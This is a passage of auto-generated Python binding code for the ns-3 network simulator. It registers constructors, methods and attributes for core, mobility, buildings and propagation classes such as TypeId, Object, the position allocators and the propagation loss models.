cls.add_method('GetHash', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function] cls.add_method('GetName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function] cls.add_method('GetParent', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function] cls.add_method('GetRegistered', 'ns3::TypeId', [param('uint32_t', 'i')], is_static=True) ## type-id.h 
(module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function] cls.add_method('GetRegisteredN', 'uint32_t', [], is_static=True) ## type-id.h (module 'core'): std::size_t ns3::TypeId::GetSize() const [member function] cls.add_method('GetSize', 'std::size_t', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function] cls.add_method('GetTraceSource', 'ns3::TypeId::TraceSourceInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function] cls.add_method('GetTraceSourceN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function] cls.add_method('GetUid', 'uint16_t', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function] cls.add_method('HasConstructor', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function] cls.add_method('HasParent', 'bool', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function] cls.add_method('HideFromDocumentation', 'ns3::TypeId', []) ## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function] cls.add_method('IsChildOf', 'bool', [param('ns3::TypeId', 'other')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function] cls.add_method('LookupAttributeByName', 'bool', [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function] cls.add_method('LookupByHash', 'ns3::TypeId', [param('uint32_t', 'hash')], is_static=True) ## 
type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function] cls.add_method('LookupByHashFailSafe', 'bool', [param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')], is_static=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function] cls.add_method('LookupByName', 'ns3::TypeId', [param('std::string', 'name')], is_static=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name')], is_const=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name, ns3::TypeId::TraceSourceInformation * info) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name'), param('ns3::TypeId::TraceSourceInformation *', 'info')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function] cls.add_method('MustHideFromDocumentation', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function] cls.add_method('SetAttributeInitialValue', 'bool', [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function] cls.add_method('SetGroupName', 'ns3::TypeId', [param('std::string', 'groupName')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function] cls.add_method('SetParent', 'ns3::TypeId', [param('ns3::TypeId', 'tid')]) ## type-id.h (module 'core'): ns3::TypeId 
ns3::TypeId::SetSize(std::size_t size) [member function] cls.add_method('SetSize', 'ns3::TypeId', [param('std::size_t', 'size')]) ## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t uid) [member function] cls.add_method('SetUid', 'void', [param('uint16_t', 'uid')]) return def register_Ns3TypeIdAttributeInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable] cls.add_instance_attribute('flags', 'uint32_t', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable] cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable] cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportLevel 
[variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::callback [variable] cls.add_instance_attribute('callback', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3Vector2D_methods(root_module, cls): cls.add_output_stream_operator() ## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector2D const &', 'arg0')]) ## vector.h (module 'core'): 
ns3::Vector2D::Vector2D(double _x, double _y) [constructor] cls.add_constructor([param('double', '_x'), param('double', '_y')]) ## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector2D::x [variable] cls.add_instance_attribute('x', 'double', is_const=False) ## vector.h (module 'core'): ns3::Vector2D::y [variable] cls.add_instance_attribute('y', 'double', is_const=False) return def register_Ns3Vector3D_methods(root_module, cls): cls.add_output_stream_operator() ## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector3D const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor] cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')]) ## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector3D::x [variable] cls.add_instance_attribute('x', 'double', is_const=False) ## vector.h (module 'core'): ns3::Vector3D::y [variable] cls.add_instance_attribute('y', 'double', is_const=False) ## vector.h (module 'core'): ns3::Vector3D::z [variable] cls.add_instance_attribute('z', 'double', is_const=False) return def register_Ns3Empty_methods(root_module, cls): ## empty.h (module 'core'): ns3::empty::empty() [constructor] cls.add_constructor([]) ## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor] cls.add_constructor([param('ns3::empty const &', 'arg0')]) return def register_Ns3Int64x64_t_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) 
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_unary_numeric_operator('-') cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor] cls.add_constructor([]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long double v) [constructor] cls.add_constructor([param('long double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor] cls.add_constructor([param('long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor] 
cls.add_constructor([param('long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor] cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function] cls.add_method('GetHigh', 'int64_t', [], is_const=True) ## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function] cls.add_method('GetLow', 'uint64_t', [], is_const=True) ## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function] cls.add_method('Invert', 'ns3::int64x64_t', [param('uint64_t', 'v')], is_static=True) ## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function] cls.add_method('MulByInvert', 'void', [param('ns3::int64x64_t const &', 'o')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::implementation [variable] cls.add_static_attribute('implementation', 'ns3::int64x64_t::impl_type const', is_const=True) return def register_Ns3Object_methods(root_module, cls): ## object.h (module 'core'): ns3::Object::Object() [constructor] cls.add_constructor([]) ## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function] cls.add_method('AggregateObject', 'void', [param('ns3::Ptr< ns3::Object >', 'other')]) ## object.h (module 'core'): void 
ns3::Object::Dispose() [member function] cls.add_method('Dispose', 'void', []) ## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function] cls.add_method('GetAggregateIterator', 'ns3::Object::AggregateIterator', [], is_const=True) ## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object.h (module 'core'): void ns3::Object::Initialize() [member function] cls.add_method('Initialize', 'void', []) ## object.h (module 'core'): bool ns3::Object::IsInitialized() const [member function] cls.add_method('IsInitialized', 'bool', [], is_const=True) ## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor] cls.add_constructor([param('ns3::Object const &', 'o')], visibility='protected') ## object.h (module 'core'): void ns3::Object::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## object.h (module 'core'): void ns3::Object::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) ## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function] cls.add_method('NotifyNewAggregate', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectAggregateIterator_methods(root_module, cls): ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')]) ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor] cls.add_constructor([]) ## object.h (module 
'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function] cls.add_method('Next', 'ns3::Ptr< ns3::Object const >', []) return def register_Ns3PositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::PositionAllocator::PositionAllocator(ns3::PositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::PositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::PositionAllocator::PositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::PositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_pure_virtual=True, is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::PositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::PositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3PropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::PropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel::PropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::PropagationLossModel::SetNext(ns3::Ptr<ns3::PropagationLossModel> next) [member function] cls.add_method('SetNext', 'void', [param('ns3::Ptr< ns3::PropagationLossModel >', 'next')]) ## 
propagation-loss-model.h (module 'propagation'): ns3::Ptr<ns3::PropagationLossModel> ns3::PropagationLossModel::GetNext() [member function] cls.add_method('GetNext', 'ns3::Ptr< ns3::PropagationLossModel >', []) ## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::CalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('CalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::PropagationLossModel::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')]) ## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::PropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], is_pure_virtual=True, visibility='private', is_virtual=True) return def register_Ns3RandomBoxPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::RandomBoxPositionAllocator::RandomBoxPositionAllocator(ns3::RandomBoxPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomBoxPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::RandomBoxPositionAllocator::RandomBoxPositionAllocator() [constructor] cls.add_constructor([]) 
## position-allocator.h (module 'mobility'): int64_t ns3::RandomBoxPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::RandomBoxPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::RandomBoxPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::RandomBoxPositionAllocator::SetX(ns3::Ptr<ns3::RandomVariableStream> x) [member function] cls.add_method('SetX', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::RandomBoxPositionAllocator::SetY(ns3::Ptr<ns3::RandomVariableStream> y) [member function] cls.add_method('SetY', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'y')]) ## position-allocator.h (module 'mobility'): void ns3::RandomBoxPositionAllocator::SetZ(ns3::Ptr<ns3::RandomVariableStream> z) [member function] cls.add_method('SetZ', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'z')]) return def register_Ns3RandomBuildingPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::RandomBuildingPositionAllocator::RandomBuildingPositionAllocator(ns3::RandomBuildingPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomBuildingPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::RandomBuildingPositionAllocator::RandomBuildingPositionAllocator() [constructor] cls.add_constructor([]) ## building-position-allocator.h (module 'buildings'): int64_t ns3::RandomBuildingPositionAllocator::AssignStreams(int64_t stream) [member function] 
cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::RandomBuildingPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::RandomBuildingPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3RandomDiscPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::RandomDiscPositionAllocator::RandomDiscPositionAllocator(ns3::RandomDiscPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomDiscPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::RandomDiscPositionAllocator::RandomDiscPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::RandomDiscPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::RandomDiscPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::RandomDiscPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetRho(ns3::Ptr<ns3::RandomVariableStream> rho) [member function] cls.add_method('SetRho', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'rho')]) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetTheta(ns3::Ptr<ns3::RandomVariableStream> theta) [member 
function] cls.add_method('SetTheta', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'theta')]) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetX(double x) [member function] cls.add_method('SetX', 'void', [param('double', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetY(double y) [member function] cls.add_method('SetY', 'void', [param('double', 'y')]) return def register_Ns3RandomPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RandomPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel::RandomPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::RandomPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::RandomPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3RandomRectanglePositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::RandomRectanglePositionAllocator::RandomRectanglePositionAllocator(ns3::RandomRectanglePositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomRectanglePositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): 
ns3::RandomRectanglePositionAllocator::RandomRectanglePositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::RandomRectanglePositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::RandomRectanglePositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::RandomRectanglePositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::RandomRectanglePositionAllocator::SetX(ns3::Ptr<ns3::RandomVariableStream> x) [member function] cls.add_method('SetX', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::RandomRectanglePositionAllocator::SetY(ns3::Ptr<ns3::RandomVariableStream> y) [member function] cls.add_method('SetY', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'y')]) return def register_Ns3RandomRoomPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::RandomRoomPositionAllocator::RandomRoomPositionAllocator(ns3::RandomRoomPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomRoomPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::RandomRoomPositionAllocator::RandomRoomPositionAllocator() [constructor] cls.add_constructor([]) ## building-position-allocator.h (module 'buildings'): int64_t ns3::RandomRoomPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## building-position-allocator.h (module 
'buildings'): ns3::Vector ns3::RandomRoomPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::RandomRoomPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3RandomVariableStream_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function] cls.add_method('SetStream', 'void', [param('int64_t', 'stream')]) ## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function] cls.add_method('GetStream', 'int64_t', [], is_const=True) ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function] cls.add_method('SetAntithetic', 'void', [param('bool', 'isAntithetic')]) ## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function] cls.add_method('IsAntithetic', 'bool', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_pure_virtual=True, is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_pure_virtual=True, is_virtual=True) ## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function] 
cls.add_method('Peek', 'ns3::RngStream *', [], is_const=True, visibility='protected') return def register_Ns3RangePropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RangePropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel::RangePropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::RangePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::RangePropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3SameRoomPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator::SameRoomPositionAllocator(ns3::SameRoomPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::SameRoomPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator::SameRoomPositionAllocator() [constructor] cls.add_constructor([]) ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator::SameRoomPositionAllocator(ns3::NodeContainer c) [constructor] cls.add_constructor([param('ns3::NodeContainer', 'c')]) ## building-position-allocator.h (module 'buildings'): int64_t 
